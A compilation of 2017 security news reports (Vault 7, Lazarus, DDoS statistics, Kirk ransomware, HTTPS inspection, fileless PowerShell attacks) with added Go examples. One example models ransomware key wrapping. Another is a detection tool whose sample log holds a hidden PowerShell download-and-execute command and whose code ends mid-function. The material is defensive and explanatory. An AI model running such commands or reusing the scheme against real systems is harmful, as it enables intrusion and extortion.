WikiLeaks clarified it would not release tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should be analyzed, disarmed and published.”

During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out,” WikiLeaks’ founder Julian Assange said during a Facebook Live press conference last week.

What has happened after a few days?

Assange contacted tech companies, including Apple, Microsoft, and Google, to explain how WikiLeaks intends to share what it knows about the vulnerabilities the CIA was allegedly exploiting.

It seems that WikiLeaks first asked the tech companies to satisfy specific conditions.

According to Motherboard, Assange sent an email to Apple, Google, Microsoft and other companies this week, including “a series of conditions” that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools included in the Vault 7 archive.

“WikiLeaks included a document in the email, requesting the companies to sign off on a series of conditions before being able to receive the actual technical details to deploy patches, according to sources,” reads the blog post published by Motherboard. “It’s unclear what the conditions are, but a source mentioned a 90-day disclosure deadline, which would compel companies to commit to issuing a patch within three months.”

Sources familiar with the matter cited by Motherboard mentioned a 90-day disclosure deadline, meaning WikiLeaks is asking the tech companies to issue patches for the vulnerabilities within three months.


WikiLeaks (@wikileaks) tweeted on March 18, 2017: “Update on CIA #Vault7 "zero day" software vulnerabilities. Ref: https://wikileaks.org/ciav7p1”

This imposes additional effort on the tech firms, which could also decide not to comply with WikiLeaks’ conditions.

Of course, the best option for the tech firms is to accept the conditions and fix the issues as soon as possible. At the same time, the CIA could decide to pass the information on the flaws to the companies itself, preventing criminals from taking advantage of the bugs. We cannot exclude that a foreign government is already exploiting the flaws in targeted attacks.

“WikiLeaks and the government hold all the cards here, there’s not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related,” one of the anonymous sources said.

The CIA declined to comment on whether it plans to alert the tech companies. According to Motherboard, a spokesperson sent a statement saying that the agency has “no comment on the authenticity of purported intelligence documents released by Wikileaks or on the status of any investigation into the source of the documents.”

“As we’ve said previously, Julian Assange is not exactly a bastion of truth and integrity,” the spokesperson wrote. “The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize US personnel and operations, but also equip our adversaries with tools and information to do us harm.”


WikiLeaks Won't Disclose CIA Exploits To Companies Until Certain Demands Are Met
18.3.2017 thehackernews BigBrothers

It's been over a week since Wikileaks promised to hand over more information on hacking tools and tactics of the Central Intelligence Agency (CIA) to the affected tech companies, following the leak of roughly 8,761 documents that Wikileaks claimed belonged to CIA hacking units.
"We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out," WikiLeaks' founder Julian Assange said during a Facebook Live press conference last week.
However, it looks like things aren't as easy for the tech companies as they seemed.
After days of waiting, Assange made his first contact with Apple, Microsoft, and Google this week and finally made his intentions clear – no sharing of the bugs and vulnerabilities the CIA is or was allegedly taking advantage of until certain demands are met.
Multiple anonymous sources familiar with the matter told Motherboard that Assange sent an email to Apple, Google, Microsoft and other companies mentioned in the Vault 7 leak this week and, instead of reporting the bugs and exploits found in the leaked CIA documents, made some demands.
A document included in the email listed "a series of conditions" that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools the anti-secrecy organization has in its possession.
Although the exact conditions are still unclear, one of the sources mentioned a 90-day disclosure deadline, which would require tech companies to issue a patch for the vulnerabilities within a three-month timeframe.
It's also not clear if any of the affected tech companies plan to comply with Wikileaks' demands.
While major tech companies like Apple, Google and Microsoft said that their recent security updates had already fixed the bugs mentioned in Vault 7, they would probably still need to check what WikiLeaks has in store to ensure the patches are complete.
What will happen next is entirely unclear, but now that the CIA's hacking arsenal has been made public, the best option for the agency is to disclose those loopholes and exploits to the affected companies itself, to keep the agency and the public safe from criminal hackers as well as foreign governments.
"WikiLeaks and the government hold all the cards here, there's not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related," one of the anonymous sources said.
Year Zero is only the first part of WikiLeaks' Vault 7 series, and the group has promised to release more from government and intelligence agencies in the coming weeks.


Symantec blames North Korean Lazarus APT group for recent attacks on banks
18.3.2017 thehackernews APT

Further investigation into the attacks against Polish banks allowed Symantec to determine that the North Korean Lazarus APT group was behind a recent string of attacks on banks.
According to malware researchers at Symantec, the North Korean APT group Lazarus was likely behind a recent string of cyber attacks against organizations in 31 countries. Symantec has also linked Lazarus to high-profile attacks on Bangladesh Bank, Sony and South Korean targets.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it has been involved both in cyber espionage campaigns and in sabotage aimed at destroying data and disrupting systems.

Experts at Symantec collected evidence demonstrating that the Lazarus APT group was behind the campaign, which leveraged a “loader” used to stage attacks by installing other malicious programs.

“We are reasonably certain” Lazarus was behind the attacks, Symantec researcher Eric Chien told Reuters.

Both US and South Korea governments are blaming Pyongyang for the attacks, but the North Korean government has denied allegations it was behind the hacks.

Symantec did not identify the organizations targeted in the latest wave of attacks, and it is not clear whether the Lazarus APT group stole money from the victims.

According to the experts from the security firm, the campaign marks a significant escalation for the Lazarus APT group, which used more sophisticated techniques and targeting than in previous attacks.

Experts at Symantec analyzed the hacking campaign launched last month by the Lazarus Group. The investigations started after Polish banks had been infected with a sophisticated strain of malware.

Polish banks confirmed their systems were infected with malware after their staff visited the site of the Polish Financial Supervision Authority (KNF).

To avoid spreading the malware, the authorities decided to shut down the entire network at the KNF “in order to secure evidence.”

Both BAE Systems and Symantec started investigating the attacks. According to Symantec, the threat actor behind them is the same one that has targeted financial organizations in 31 countries since at least October 2016.

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The attackers used a “watering hole” approach to infect the machines of a specific audience with previously unknown malware.

“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.

At the time, Symantec said it had “weak evidence” to blame the Lazarus APT, but now the data gathered by the experts confirm the involvement of the group.

The malicious code was configured to infect only visitors whose IP address showed they came from one of 104 specific organizations in 31 countries.

The largest number of victims were in Poland, followed by the United States, and Mexico.


Global DDoS Threat Landscape Q4 2016 – US, UK and Netherlands top attacked countries
18.3.2017 securityaffairs Attack

Imperva has published its Global DDoS Threat Landscape Q4 2016 report; according to the experts, the US, the UK and the Netherlands were the top attacked countries.
Distributed denial of service (DDoS) attacks continue to represent a serious threat to organizations worldwide. The attacks are growing in size and level of sophistication, according to the new report ‘Global DDoS Threat Landscape Q4 2016’ published by Imperva.

According to the experts at Imperva, the creation of huge Internet of Things botnets and the availability of cheap DDoS-for-hire services are creating the conditions for the growth of DDoS attacks.

Network layer attack sizes reached a record high: just before Christmas, a massive DDoS attack powered by a new botnet dubbed Leet Botnet hit Imperva's own network.

The Mirai botnet was also used to power similar DDoS attacks in the same period. The quarter also saw the longest network layer attack of the year, which lasted for 29 days.

Such volumes of malicious traffic are reached through the use of amplification vectors.

The number of application layer attacks continued to increase, peaking in Q4 at 889 attacks a week.

In the last quarter of the year, experts from Imperva mitigated an average of 280 network layer attacks per week, totaling 3,603, a 39.4% drop from Q3. According to the experts, the majority of DDoS attacks (89%) lasted for less than one hour.

Imperva mitigated 11,727 application layer attacks, for an average of 889 per week (+2.9% from Q3 2016).

“In Q4 2016, single-vector network attacks increased by almost seven percent from Q3, reaching a yearly high of 71%. Moreover, the percentage of assaults in which perpetrators used five or more different payloads dropped from 3.9 percent in Q3 to 1.9 percent in the following quarter.” reads the report.

“With respect to multi-vector attacks, the downward trend we’re seeing can likely be attributed to the increase in less-sophisticated assaults being instigated by non-professional perpetrators using botnet-for-hire (a.k.a., stresser or booter) services.”

The largest application layer attack reached 91,209 RPS (requests per second), while the longest application layer attack lasted 47 days. 74.7% of application layer DDoS attacks lasted less than an hour.

“The Incapsula network saw an increase in attack frequency, with the number of targets hit by multiple assaults reaching 58.3 percent, compared with 54.7 percent in Q3.” continued the Incapsula report. “In fact, the percentage of sites targeted more than ten times in Q4 reached 13.1 percent, the highest figure ever recorded for this attack frequency category.”

To avoid detection, DDoS bots continue to use fake user agents to pose as legitimate tools and browsers.

According to the experts, the quantity of sophisticated, browser-based bots that retain cookies and execute JavaScript jumped from 8.0% up to 13.6% in Q4.

Looking at the top attacking countries, China is in first place (78.5%), followed by Vietnam (4.5%), South Korea (2.9%) and the United States (1.7%).

The US was the Top targeted country (56.7%), followed by the United Kingdom (9.6%), and the Netherlands (8.6%).


The Global DDoS Threat Landscape Q4 2016 report includes much more interesting data on these threats. Enjoy it!


Star Trek-Themed "Kirk" Ransomware Emerges

17.3.2017 securityweek Virus
A newly discovered piece of ransomware featuring a Star Trek theme is targeting 625 different file types and demanding a ransom be paid in virtual currency Monero, security researchers have discovered.

The threat is dubbed Kirk and is paired with a decryptor called Spock, references to two characters in the Star Trek science fiction series. Discovered by Avast malware researcher Jakub Kroustek, the new malware was written in Python and might be the very first threat of its kind to use Monero as its payment currency.

Monero is an open-source cryptocurrency launched on April 18, 2014 with a focus on privacy that started seeing increased popularity only last year, after major darknet market AlphaBay adopted it at the end of summer 2016. Over the past several months, we’ve seen Monero miners distributed by the Sundown exploit kit and its Terror EK variation, as well as by other threats targeting Windows and Linux machines.

However, as BleepingComputer’s Lawrence Abrams notes, Kirk ransomware might be the very first to utilize Monero for payment purposes. Most other ransomware out there demands Bitcoin instead, and the change could actually create confusion, the researcher argues.

“Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult,” Abrams says.

Kirk ransomware’s distribution channels aren’t clear at the moment, but the researchers have seen it masquerading as the network stress tool called Low Orbital Ion Cannon. Upon execution, the ransomware generates an AES key used to encrypt a victim's files, after which it encrypts the key using an embedded RSA-4096 public encryption key and saves it in a file called pwd in the same directory as the ransomware executable.

Only the attackers are able to decrypt this file and reveal the AES encryption key, and Kirk ransomware victims are advised to make sure they don’t delete it. The attackers apparently ask for this file in order to provide the victims with the needed decryptor.
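
What the two paragraphs above describe is standard envelope encryption, and seeing it in code makes clear what the pwd file is and is not. The Go program below is an added illustration written for this page, not Kirk's code: a random AES key encrypts the data, the key alone is wrapped with the operator's RSA public key, and the wrapped key is the only thing the victim can hand over. AES-256-GCM, RSA-OAEP and a 2048-bit key are assumptions made here for a fast, runnable example; the analysis names only AES and an embedded RSA-4096 public key.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Envelope is what is left on the victim's disk: the encrypted data and the
// wrapped AES key, i.e. the contents of the "pwd" file. Neither part reveals
// the AES key on its own.
type Envelope struct {
	Ciphertext []byte // GCM nonce || AES-GCM ciphertext and tag
	WrappedKey []byte // RSA-OAEP(operatorPublicKey, aesKey)
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal models the scheme: a fresh random AES key per victim, and that key
// encrypted to the public key embedded in the binary. AES-256-GCM and OAEP
// are assumptions made for this illustration.
func Seal(operatorPub *rsa.PublicKey, plaintext []byte) (*Envelope, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, operatorPub, key, nil)
	if err != nil {
		return nil, err
	}
	return &Envelope{Ciphertext: gcm.Seal(nonce, nonce, plaintext, nil), WrappedKey: wrapped}, nil
}

// Recover is the step only the operator's "Spock" decryptor can perform: unwrap
// the AES key with the RSA private key, then decrypt. Any other private key fails
// at the unwrap, which is why pwd must be preserved yet is useless to the victim.
func Recover(operatorPriv *rsa.PrivateKey, env *Envelope) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), nil, operatorPriv, env.WrappedKey, nil)
	if err != nil {
		return nil, errors.New("wrapped key was not produced for this private key")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	ns := gcm.NonceSize()
	if len(env.Ciphertext) < ns {
		return nil, errors.New("ciphertext too short")
	}
	return gcm.Open(nil, env.Ciphertext[:ns], env.Ciphertext[ns:], nil)
}

// NewOperatorKey stands in for the key pair the operators keep offline. 2048 bits
// here to keep the example fast; the sample reportedly embeds a 4096-bit key.
func NewOperatorKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

func main() {
	operator := NewOperatorKey()
	env, err := Seal(&operator.PublicKey, []byte("constructed sample document"))
	if err != nil {
		panic(err)
	}
	fmt.Printf("pwd holds %d bytes of wrapped key\n", len(env.WrappedKey))
	_, err = Recover(NewOperatorKey(), env)
	fmt.Println("victim-side attempt with another key:", err)
	pt, err := Recover(operator, env)
	fmt.Printf("operator-side recovery: %q, %v\n", pt, err)
}
```

The Recover call with a second, unrelated key is the point of the exercise: without the operator's private key the unwrap step fails, and nothing in the ciphertext itself helps, which is why the pwd file is worthless to the victim yet has to be kept for any recovery to be possible at all.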

Kirk ransomware displays a message box showing the same slogan as the LOIC network stress tool: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0.” In the background, the ransomware searches the hard drive for files to encrypt. It targets a total of 625 file types, encrypts them and appends the .kirk extension to the encrypted file's name.

The malware drops a ransom note in the same folder as the executable and displays it in a window on the desktop. Users are instructed to purchase around $1,100 worth of Monero and send it to a specific address. After making the payment, the victim should send the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses.

The Spock decryptor is supposedly sent to the victim after the payment is made. Unfortunately, the researchers haven’t had the chance to analyze this tool yet.

“At this time there are no known victims of this ransomware and it does not appear to be decryptable,” Abrams says.


Hackers Earn Big Bounties for GitHub Enterprise Flaws

17.3.2017 securityweek Vulnerebility
White hat hackers have earned tens of thousands of dollars in bounties after finding serious vulnerabilities in GitHub Enterprise.

GitHub Enterprise is the on-premises version of GitHub.com, for which organizations pay an annual fee of $2,500 for every 10 users. The product promises enterprise-grade security, 24/7 technical support, hosting options, and several administration features not available for GitHub.com.

GitHub Enterprise versions 2.8.5, 2.8.6 and 2.8.7, released in January, patch several flaws rated critical and high severity, including ones that can be exploited to bypass authentication and remotely execute arbitrary code.

The researchers who discovered the vulnerabilities have started making their findings public, and information from GitHub and the experts themselves shows that they earned significant rewards.

GitHub included the Enterprise product in its bug bounty program at the beginning of the year, when it announced that the most severe bugs reported in January and February would also receive bonus rewards.

Two of the vulnerabilities rated critical were identified by Greece-based researcher Ioannis Kakavas. The expert discovered a couple of flaws in the Security Assertion Markup Language (SAML) implementation of GitHub Enterprise, and received a research grant to conduct a full assessment of SAML in GitHub.

Kakavas, who is currently ranked second in GitHub’s bug bounty program, earned a total of $27,000 for the flaws he uncovered. He recently published a blog post containing technical details and proof-of-concept (PoC) code.

Another critical flaw was discovered by German bug bounty hunter Markus Fenske. The expert found a weakness in the management console that could have been exploited to execute arbitrary commands on the GitHub Enterprise appliance.

Fenske has received a total of $18,000 for his findings, which includes a $10,000 bounty, the maximum reward offered by GitHub, and an $8,000 bonus.

Researcher Orange Tsai, who last year managed to hack a Facebook server, received $5,000 and a $5,000 bonus for responsibly disclosing a high severity SQL injection vulnerability related to the pre-receive hook APIs used by GitHub Enterprise.

GitHub said there was no evidence that the vulnerabilities identified by Fenske and Kakavas had been exploited in the wild.


U.S. Warns of Security Issues With HTTPS Inspection Products

17.3.2017 securityweek Safety
The U.S. Department of Homeland Security's US-CERT has issued a new alert warning about problems with some HTTPS inspection products.

The alert, 'HTTPS Interception Weakens TLS Security (TA17-075A)' warns that "Failure [by the SSL/TLS interception software] to perform proper validation or adequately convey the validation status increases the probability that the client will fall victim to MitM attacks by malicious third parties."

This alert follows the publication earlier this month of a detailed study of the problem. The study concluded that HTTPS interception before the endpoint (such as that done by anti-virus products) can weaken rather than strengthen network security. The CERT Coordination Center (CERT/CC) first raised the issue two years ago in a blog post titled 'The Risks of SSL Inspection' -- but US-CERT has only now issued an alert.

The reason for this long delay between unofficial and official warnings is probably twofold. Firstly, the "blog post for CERT was mostly an observation based on a very small sample set of HTTPS inspection solutions that I was able to test myself," author Will Dormann, a vulnerability analyst at CERT/CC, told SecurityWeek. "It was posed as an issue that needed to be investigated, with the goal that folks with the devices in question could perform their own testing and ideally get back to us with the results."

It was, in short, a valid but not-scientific analysis of the problem. The new scientific paper, he adds, "appears to have used my blog post as motivation. But they were able to take it much further and provide some real-world statistics about the prevalence of HTTPS interception. This presumably took some time to develop and collect results."

Dormann believes that the arrival of this paper and the availability of an easy-to-use test website (badssl.com) have combined to make the time right for a US-CERT alert.

The second motivation for the alert is the increasing use of encryption by malicious actors to bypass security defenses and to hide data exfiltration. Dell highlighted the problem in its 2016 Threat Report. At least 900 million users were affected by encrypted hacks in 2015, it said.

Industry's response has been to install HTTPS inspection software to unpack the encryption and allow traffic inspection. This interception can be found in a range of products including anti-virus, firewalls, DLP, and secure web gateways. They operate by performing the customer's own 'legal' MitM attack on the traffic -- but in doing so they break the end-to-end encryption from the trusted server to the end client.

The problem comes in how the HTTPS inspection product then attempts to provide its own 'trust' to the client -- and tests have shown that many of the products are lacking. "Many HTTPS inspection products do not properly verify the certificate chain of the server before re-encrypting and forwarding client data," warns US-CERT, "allowing the possibility of a MitM attack. Furthermore, certificate-chain verification errors are infrequently forwarded to the client, leading a client to believe that operations were performed as intended with the correct server." It adds, "Because client systems may connect to the HTTPS inspection product using strong cryptography, the user will be unaware of any weakness on the other side of the HTTPS inspection."

This leaves industry with a difficult choice: to inspect HTTPS traffic for reasons of security and risk increasing the attack surface in the process; or to leave alone and find other ways to protect against encrypted bad intent. "There are compelling business reasons for corporations to be able to 'see into' encrypted traffic flows," comments Erka Koivunen, chief information security officer at F-Secure Corporation. "For instance, financial institutions may want to extend their control into encrypted traffic flows in terms of content inspection and Data Loss Prevention. It is no wonder the vendor community is pressurized to come up with 'innovative' ways to terminate HTTPS encryption by means of MitM."

But he doesn't think using good-intentioned MitM is the answer. "The research by CERT/CC and the US-CERT advisory seem to confirm our point of view," he told SecurityWeek. "MitM'ing HTTPS traffic adds unnecessary complexity and creates a risky tradeoff between content inspection and communications security." F-Secure has chosen not to provide an HTTPS inspection capability.

"Most of the functionality can, however, be enforced at an endpoint level," he added, "and this is where F-Secure has committed to excel. We believe that endpoint security solutions will continue to play a central role in enterprise security. While the 'other endpoint' will increasingly reside in the cloud, the security stack needs to be complemented with security in the cloud."

This won't suit all organizations; particularly those that choose 'security in depth'. US-CERT recommends that whether HTTPS inspection is employed or not, organizations should take additional steps to secure communications -- and points to the earlier alert (TA15-120A): Securing End-to-End Communications. This recommends using the latest version of TLS or SSL; using certificate pinning; the use of DNS-based Authentication of Named Entities (DANE); and using network notary services.

For HTTPS inspection products, suggests US-CERT, organizations could "use badssl.com as a method of determining if their preferred HTTPS inspection product properly validates certificates and prevents connections to sites using weak cryptography."
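
The two behaviours US-CERT contrasts above, the upstream check an inspection product must perform and the accept-anything failure it warns about, can be exercised offline. The Go program below is an added example written for this page, not code from US-CERT, CERT/CC or badssl.com: it builds a throwaway root CA and reproduces four of the badssl.com cases (valid, expired, self-signed and wrong hostname) as in-memory certificates, then runs each through a proper verifier and a broken one. The function names, the example.com test hosts and the use of ECDSA P-256 are this example's own choices.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// ProperVerify checks chain, validity period and requested hostname, as the browser would have.
func ProperVerify(leaf *x509.Certificate, roots *x509.CertPool, host string) error {
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: host})
	return err
}

// BrokenVerify is the failure US-CERT describes: any upstream certificate is accepted.
func BrokenVerify(*x509.Certificate, *x509.CertPool, string) error { return nil }

type Scenario struct {
	Name string
	Leaf *x509.Certificate
	Host string // the hostname the client actually asked for
}

func must(err error) {
	if err != nil {
		panic(err)
	}
}

func newKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	must(err)
	return k
}

// issue signs tmpl with signer's key; parent == nil yields a self-signed cert.
func issue(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, signer *ecdsa.PrivateKey) *x509.Certificate {
	if parent == nil {
		parent = tmpl
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	must(err)
	c, err := x509.ParseCertificate(der)
	must(err)
	return c
}

// BuildScenarios builds a throwaway root CA and the badssl.com cases: valid, expired, self-signed, wrong host.
func BuildScenarios() (*x509.CertPool, []Scenario) {
	now := time.Now()
	caKey := newKey()
	ca := issue(&x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "Test Root CA"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		IsCA: true, BasicConstraintsValid: true, KeyUsage: x509.KeyUsageCertSign,
	}, nil, &caKey.PublicKey, caKey)
	base := x509.Certificate{
		Subject: pkix.Name{CommonName: "example.com"}, DNSNames: []string{"example.com"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	valid, expired, rogue := base, base, base
	valid.SerialNumber = big.NewInt(2)
	expired.SerialNumber = big.NewInt(3)
	expired.NotBefore, expired.NotAfter = now.Add(-48*time.Hour), now.Add(-24*time.Hour)
	rogue.SerialNumber = big.NewInt(4) // an on-path attacker's own cert for example.com
	serverKey, rogueKey := newKey(), newKey()
	good := issue(&valid, ca, &serverKey.PublicKey, caKey)
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	return roots, []Scenario{
		{"valid", good, "example.com"},
		{"expired", issue(&expired, ca, &serverKey.PublicKey, caKey), "example.com"},
		{"self-signed", issue(&rogue, nil, &rogueKey.PublicKey, rogueKey), "example.com"},
		{"wrong-host", good, "login.example.net"},
	}
}

// Accepted runs each scenario through verify and reports which ones it let through.
func Accepted(verify func(*x509.Certificate, *x509.CertPool, string) error, roots *x509.CertPool, cases []Scenario) map[string]bool {
	out := make(map[string]bool, len(cases))
	for _, s := range cases {
		out[s.Name] = verify(s.Leaf, roots, s.Host) == nil
	}
	return out
}

func main() {
	roots, cases := BuildScenarios()
	fmt.Println("proper validation accepts:", Accepted(ProperVerify, roots, cases))
	fmt.Println("broken validation accepts:", Accepted(BrokenVerify, roots, cases))
}
```

An operator testing a real product does the same thing from a client behind it, against the live badssl.com endpoints: a product whose results match the proper column has validated the upstream chain; one that matches the broken column is the case the alert describes, and its clients will see only the proxy's own certificate, with no hint that the upstream check failed.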

It is true, High Tech Bridge CEO Ilia Kolochenko, told SecurityWeek, "many organizations wrongly implement HTTPS interception by forcing all their client devices to trust any certificate. In a corporate environment, this can significantly facilitate phishing and drive-by-download attacks." But, he added, "US-CERT's recommendations, as well as HPKP usage, can solve this problem in a quite reliable manner."


Recent Fileless Attacks Linked to Single Framework, Researchers Say

17.3.2017 securityweek Virus

A series of “fileless attacks” previously attributed to two different threat actors are now believed to have been carried out by the same actor, from a single attack framework, Israeli security firm Morphisec reveals.

Starting on March 8, Morphisec researchers began investigating a new fileless attack carried out via a macro-enabled Word document attached to a phishing email that targeted high-profile enterprises. Their investigation led them to the discovery of a sophisticated fileless attack framework associated with multiple recent campaigns.

Last month, Kaspersky Lab uncovered a campaign comprised of more than 140 attacks aimed at banks, telecom companies and government organizations in the United States, the United Kingdom, France, Ecuador, Kenya, Brazil, Spain, Israel and 32 other countries. Common to these attacks was the use of PowerShell scripts to store the malicious code in memory and avoid leaving traces on the compromised machines.

In early March, Cisco detailed a so-called DNSMessenger attack, where threat actors were using a malicious Word document and a PowerShell RAT that could communicate with the command and control (C&C) servers via DNS requests. This sophisticated attack was also completely fileless and invisible to most standard anti-malware defenses.

Another recently spotted fileless attack was installing a PowerShell backdoor dubbed POWERSOURCE onto infected computers, which FireEye linked to a threat group called FIN7. The actor has been targeting organizations in the United States, focusing on personnel that handle filings to the Securities and Exchange Commission (SEC).

According to Morphisec, all these attacks are actually linked to each other, and all had been leveraging the same fileless attack framework that the security company managed to access. In fact, the company says that the same threat group is responsible for all of the attacks.

“Based on our findings, a single group of threat actors is responsible for many of the most sophisticated attacks on financial institutions, government organizations and enterprises over the past few months,” the security researchers reveal. What Morphisec doesn’t say, however, is who these actors are.

The security researchers even had a brief encounter with these actors, “via the very same PowerShell protocol used for the attack delivery,” which revealed that the hacker was part of an organization targeting specific companies. Following the encounter, the cybercriminals shut down the C&C server, which might have resulted in the loss of foothold in the systems connected to that server.

Similar to previously described campaigns, the attack uses a weaponized Word document that delivers a PowerShell agent capable of opening a backdoor and establishing persistence. In most cases, the actors then move to delivering different PowerShell commands through the C&C, depending on the target.

“For some targets, the attack was fully fileless, eventually delivering a Meterpreter session directly to memory. In other cases, the password-stealer LaZagne Project or another Python executable was delivered and executed. After additional investigation, we identified controllers for different protocols including Cmd, Lazagne, Mimikatz and more,” Morphisec explains.

The malicious Word document claims to be protected and asks the potential victims to enable the content to view it, which allows the macros to run. The included PowerShell executes using Windows Management Instrumentation (WMI), a technique already adopted by various malware families to evade detection.

After several decryption stages, the decrypted PowerShell is saved to disk. The script observed in one attack was found to be an agent capable of receiving commands from the C&C, executing them and returning the results. The malware was also found to lower Office’s macro restrictions so that other macro-based documents are executed automatically.
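
Because the chain above leaves almost nothing on disk, the realistic detection point is process-creation telemetry: powershell.exe started by an Office application or by the WMI provider host, with an encoded or hidden-window command line. The Go program below is an added example written for this page, not Morphisec's or any vendor's code. It runs such rules over four constructed Sysmon-style records (not a real capture) and decodes the UTF-16LE base64 that PowerShell's -EncodedCommand uses, so the same indicators can be matched inside the hidden payload. The record layout, the WmiPrvSE.exe parent and the indicator list are assumptions of the example.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// Constructed sample records (not a real capture) in the shape of Sysmon event 1:
// two routine PowerShell launches and the two chains described above, one spawned
// by a Word macro with an encoded command, one spawned through WMI (WmiPrvSE.exe).
// The -Enc value is "IEX (New-Object" as UTF-16LE base64, the form PowerShell expects.
const SampleLog = `Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe -File C:\scripts\backup.ps1"
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE CommandLine="powershell -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe CommandLine="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\svchost.exe CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"`

var (
	lineRe       = regexp.MustCompile(`^Image=(\S+) ParentImage=(.+?) CommandLine="(.*)"$`)
	officeParent = regexp.MustCompile(`(?i)\\(winword|excel|powerpnt|outlook)\.exe$`)
	wmiParent    = regexp.MustCompile(`(?i)\\wmiprvse\.exe$`)
	encodedFlag  = regexp.MustCompile(`(?i)-(enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]{16,})`)
	inMemory     = regexp.MustCompile(`(?i)(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|\biex\b|invoke-expression|downloadstring|frombase64string)`)
)

// Finding is one PowerShell launch that matched, with the reasons and, when an
// -EncodedCommand was present, its decoded plaintext.
type Finding struct {
	Line    int
	Reasons []string
	Decoded string
}

// DecodeEncodedCommand returns the plaintext of a -EncodedCommand argument, or "".
func DecodeEncodedCommand(cmd string) string {
	m := encodedFlag.FindStringSubmatch(cmd)
	if m == nil {
		return ""
	}
	raw, err := base64.StdEncoding.DecodeString(m[2])
	if err != nil || len(raw)%2 != 0 {
		return ""
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u))
}

// Analyze flags powershell.exe launches with an Office or WMI parent, an encoded
// command, or flags and cmdlets typical of staging a payload in memory.
func Analyze(log string) []Finding {
	var out []Finding
	for i, line := range strings.Split(log, "\n") {
		m := lineRe.FindStringSubmatch(line)
		if m == nil || !strings.HasSuffix(strings.ToLower(m[1]), `\powershell.exe`) {
			continue
		}
		parent, cmd := m[2], m[3]
		var reasons []string
		if officeParent.MatchString(parent) {
			reasons = append(reasons, "spawned by an Office process (macro)")
		}
		if wmiParent.MatchString(parent) {
			reasons = append(reasons, "spawned through WMI (WmiPrvSE.exe)")
		}
		decoded := DecodeEncodedCommand(cmd)
		if decoded != "" {
			reasons = append(reasons, "base64-encoded command")
		}
		if inMemory.MatchString(cmd + " " + decoded) {
			reasons = append(reasons, "in-memory execution indicators")
		}
		if len(reasons) > 0 {
			out = append(out, Finding{Line: i + 1, Reasons: reasons, Decoded: decoded})
		}
	}
	return out
}

func main() {
	for _, f := range Analyze(SampleLog) {
		fmt.Printf("line %d: %s", f.Line, strings.Join(f.Reasons, "; "))
		if f.Decoded != "" {
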